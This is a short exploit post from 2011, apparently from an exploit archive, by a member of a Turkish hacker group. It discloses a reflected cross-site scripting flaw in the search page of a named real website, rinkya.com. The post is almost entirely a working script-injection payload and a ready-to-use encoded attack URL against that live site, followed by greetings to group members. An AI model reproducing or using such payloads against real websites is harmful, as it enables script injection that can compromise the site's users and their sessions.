# Exploit Title: Rinkya Cross Site Scripting
# Date: 22.10.2011 - 17.52
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php

-------------------------------------------------------------

search.php

http://www.rinkya.com/membership/search.php

"><script>alert("DDz Mr.PaPaRoSSe")</script>


http://www.rinkya.com/membership/search.php?sType=Auction&searchstring=%22%3E%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E&SUBMIT=Sorguyu+g%C3%B6nder

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n     -  ALEXTRAX      -  sanTiq0  
Deathless  -  ZyX           -  Tarxes
53rh4+     -  bLaCk_uMo     -  PeRs 
syntaX     -  Mavi_Karalęk  -  DarkCOD3R

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]